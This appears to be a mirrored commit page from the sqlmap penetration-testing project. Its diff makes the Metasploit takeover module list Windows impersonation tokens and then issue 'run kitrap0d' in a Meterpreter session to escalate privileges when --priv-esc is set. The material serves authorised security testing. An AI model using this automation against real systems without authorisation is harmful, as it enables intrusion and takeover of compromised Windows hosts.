PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-07 05:01:30 +00:00
Code Issues Projects Releases Wiki Activity

run kitrap0d script along with listing Windows Impersonation Tokens via meterpreter's incognito extension when --priv-esc is provided (see #149).

Browse Source
This commit is contained in:
Bernardo Damele
2010-01-26 01:14:44 +00:00
parent a97e20d8e1
commit 6437c16156
2 changed files with 14 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

13
lib/takeover/metasploit.py
View File

@@ -187,9 +187,10 @@ class Metasploit:
def __selectPayload(self, askChurrasco=True):
if kb.os == "Windows" and conf.privEsc:
infoMsg = "forcing Metasploit payload to Meterpreter because "
infoMsg += "it is the only payload that can abuse Windows "
infoMsg += "Access Tokens via Meterpreter 'incognito' "
infoMsg += "extension to privilege escalate"
infoMsg += "it is the only payload that can be used to "
infoMsg += "escalate privileges, either via 'incognito' "
infoMsg += "extension or via 'kitrap0d' script, "
infoMsg += "http://tinyurl.com/kitrap0d for details"
logger.info(infoMsg)
__payloadStr = "windows/meterpreter"
@@ -458,6 +459,12 @@ class Metasploit:
proc.stdin.write("list_tokens -u\n")
infoMsg = "trying also to escalate privileges using "
infoMsg += "kitrap0d script"
logger.info(infoMsg)
proc.stdin.write("run kitrap0d\n")
def __controlMsfCmd(self, proc, func):
stdin_fd = sys.stdin.fileno()
setNonBlocking(stdin_fd)